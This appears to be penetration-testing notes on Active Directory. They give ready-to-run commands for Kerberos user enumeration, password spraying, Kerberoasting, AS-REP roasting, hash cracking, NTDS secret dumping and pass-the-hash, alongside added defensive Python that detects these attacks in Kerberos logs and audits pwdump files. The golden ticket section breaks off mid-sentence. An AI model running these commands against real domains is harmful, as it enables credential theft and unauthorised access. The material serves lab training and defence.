# Active Directory
Active Directory is a collection of machines and servers joined to domains; those domains in turn belong to a larger forest, and together they make up the Active Directory network.
# Forest
An AD forest is a collection of one or more domain trees inside an Active Directory network. It is the top-level container that organises the parts of the network as a whole.
- Trees - A hierarchy of domains in Active Directory Domain Services
- Domains - Used to group and manage objects
- Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
- Trusts - Allow users to access resources in other domains
- Objects - Users, groups, printers, computers, shares
- Domain Services - DNS Server, LLMNR, IPv6
- Domain Schema - Rules for object creation
# Enumeration
```
net user                 # display local users
net user /domain         # display domain-joined users
net user mike /domain    # display info on one domain-joined user
```
# Kerberos TCP/88
Enumerate users:
```
./kerbrute userenum --dc 10.10.10.10 -d example.local userlist.txt -t 100   # enumerate users using kerbrute
./kerbrute userenum --dc example.local -d example.local User.txt            # sometimes it works better with domain names
```
Harvesting tickets: you can use the Rubeus utility to harvest tickets: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
```
Rubeus.exe harvest /interval:30
```
Brute-forcing tickets: this takes a given password and "sprays" it against all found users, then returns the .kirbi TGT if successful. This attack can lock accounts out.
```
Rubeus.exe brute /password:Password1 /noticket
```
# Kerberoasting
Kerberoasting allows us to request a service ticket for any service with a registered SPN and then use that ticket to crack the service account's password offline. Any account with a registered SPN is potentially Kerberoastable. Success depends on the strength of the password and the privileges of the account.
Using impacket:
```
GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.10.10 -request
```
Using Rubeus:
```
Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcat
```
and then crack:
```
hashcat -m 13100 hashes.txt -a 0 /usr/share/wordlists/rockyou.txt --force
```
Now what? You can use those cracked passwords to run services with the permissions assigned to the service account.
```
runas /netonly /User:ServiceAccount1 powershell.exe
```
# AS-REP Roasting
Similar to Kerberoasting, AS-REP Roasting is an attack against accounts with "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH) set to true.
Example using impacket:
```
for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done
```
Example using Rubeus:
```
Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat
```
And then crack:
```
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force
```
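The three Kerberos techniques above (user enumeration, Kerberoasting and AS-REP roasting) each leave a recognisable trace in the domain controller's Security log, and that is where a defender looks for them. The following is an added example, not part of the original notes or of any of the tools named here: it runs simple detection logic over a handful of constructed 4768/4769 event records whose field names mirror the Windows Security log (`TicketEncryptionType`, `PreAuthType`, `Status`, `IpAddress`). The sample events, IP addresses, account names and alert thresholds are all assumptions made for the demonstration.

```python
"""Detection over constructed Kerberos audit events.

Added example, not from the original notes. Flags three patterns the sections
above describe, using the Windows Security log field names:
  * 4768 failures with Status 0x6 (client principal unknown) in volume from one
    client, the trace left by username enumeration
  * 4768 successes with PreAuthType 0, i.e. a TGT issued without
    pre-authentication, the condition AS-REP roasting relies on
  * 4769 service-ticket requests with RC4 encryption (0x17) for several
    distinct non-machine services from one client (Kerberoasting)
Sample events, IPs and account names are constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"

# Constructed sample events (not real logs); keys mirror the Security event XML data fields.
SAMPLE_EVENTS = [
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "WS01$", "TicketEncryptionType": "0x12",
     "IpAddress": "10.0.0.20", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.21", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "0",
     "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "IpAddress": "10.0.0.20", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "nosuchuser1", "PreAuthType": "-",
     "IpAddress": "10.0.0.50", "Status": "0x6"},
    {"EventID": 4768, "TargetUserName": "nosuchuser2", "PreAuthType": "-",
     "IpAddress": "10.0.0.50", "Status": "0x6"},
    {"EventID": 4768, "TargetUserName": "typo", "PreAuthType": "-",
     "IpAddress": "10.0.0.20", "Status": "0x6"},
]


def is_machine_account(name):
    """Computer accounts end in '$'; RC4 tickets for them are common and low signal."""
    return name.endswith("$")


def user_enum_suspects(events, threshold=2):
    """Return {client_ip: count} of 4768 'principal unknown' failures per client,
    keeping only clients at or above threshold. A single typo is normal; a burst
    of unknown names from one host is not."""
    counts = defaultdict(int)
    for e in events:
        if e.get("EventID") == 4768 and e.get("Status") == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            counts[e["IpAddress"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def asrep_roast_suspects(events):
    """Return (client_ip, account) pairs where a TGT was issued with PreAuthType 0.
    Each hit also names an account that should have pre-authentication re-enabled."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e.get("EventID") == 4768 and e.get("Status") == "0x0"
            and e.get("PreAuthType") == "0"]


def kerberoast_suspects(events, threshold=3):
    """Return {client_ip: sorted service names} for clients that obtained RC4-encrypted
    service tickets for >= threshold distinct non-machine services. krbtgt is skipped
    because TGS requests for it are not Kerberoast targets."""
    per_client = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e.get("ServiceName", "")
        if is_machine_account(svc) or svc == "krbtgt":
            continue
        per_client[e["IpAddress"]].add(svc)
    return {ip: sorted(s) for ip, s in per_client.items() if len(s) >= threshold}


if __name__ == "__main__":
    print("user enumeration:", user_enum_suspects(SAMPLE_EVENTS))
    print("AS-REP roasting:", asrep_roast_suspects(SAMPLE_EVENTS))
    print("Kerberoasting:", kerberoast_suspects(SAMPLE_EVENTS))
```

The RC4 filter is the key design choice: service accounts that only accept AES ticket encryption (and have passwords long enough to resist cracking) do not show up as 0x17 requests, so the same attribute that makes an account Kerberoastable is what the detection keys on. Tune the thresholds to the environment; on a real domain controller the inputs come from the 4768/4769 events rather than a hard-coded list.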
# Golden ticket attack
A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket,
# Dumping secrets
If you get credentials for a user who has the rights to do so, you can use impacket's secretsdump.py to get hashes from NTDS.DIT:
```
impacket-secretsdump backup:password1234@10.10.10.10 > secrets.txt
```
pwdump format:
```
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
```
Note: the LM hash is no longer used and is only present for backwards compatibility; it will be the hash of "no password" (aad3b435b51404eeaad3b435b51404ee).
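A dump in this format is just as useful to the defender auditing the domain as to the attacker, because the same file reveals accounts with an empty password, accounts that still store a real LM hash, and accounts sharing one NT hash (password reuse). The following is an added example, not code from the original notes or from impacket: a small parser for the pwdump line layout given above, plus an audit pass over it. The sample dump is constructed; the only real values in it are the well-known empty-password hashes (LM aad3b435b51404eeaad3b435b51404ee, NT 31d6cfe0d16ae931b73c59d7e0c089c0), every other hash is made up.

```python
"""Parser and audit for pwdump-format lines (added example, not from the notes).

The line format mirrors the one above:
    <Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
Sample lines are constructed; apart from the empty-password LM/NT hashes,
every hash value is made up for the password-reuse demonstration.
"""
from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample dump (not real data).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP\\svc_sql:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\\jdoe:1106:1a2b3c4d5e6f70811a2b3c4d5e6f7081:fedcba9876543210fedcba9876543210:::

CORP\\WS01$:1107:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdefab:::
"""


@dataclass
class HashEntry:
    username: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_pwdump(text):
    """Parse pwdump lines into HashEntry objects. Blank lines are skipped;
    malformed lines raise ValueError so a bad dump is not silently mis-audited."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"line {lineno}: expected at least 4 colon-separated fields")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"line {lineno}: LM and NT hashes must be 32 hex characters")
        entries.append(HashEntry(user, int(rid), lm, nt))
    return entries


def audit(entries):
    """Return the findings a defender cares about:
    - empty_password: accounts whose NT hash is the empty-password hash
    - lm_stored: accounts still storing a real LM hash (weak; LM storage should be disabled)
    - shared_nt: NT hashes used by more than one account, i.e. password reuse
      (machine accounts are excluded because their passwords are random and rotated)
    """
    by_nt = defaultdict(list)
    for e in entries:
        if not e.username.endswith("$"):
            by_nt[e.nt_hash].append(e.username)
    return {
        "empty_password": [e.username for e in entries if e.nt_hash == EMPTY_NT],
        "lm_stored": [e.username for e in entries if e.lm_hash != EMPTY_LM],
        "shared_nt": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


if __name__ == "__main__":
    for finding, value in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

The shared-hash check is the one that pays off most often in practice: a built-in Administrator and a service account with the same NT hash means one cracked or passed hash opens both, which is exactly the situation the pass-the-hash step below exploits.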
# Pass the hash
Using evil-winrm we can pass an NT hash we found to gain access:
```
./evil-winrm.rb -i 10.10.154.3 -u Administrator -H e4876a80a723612986d7609aa5ebc12b
```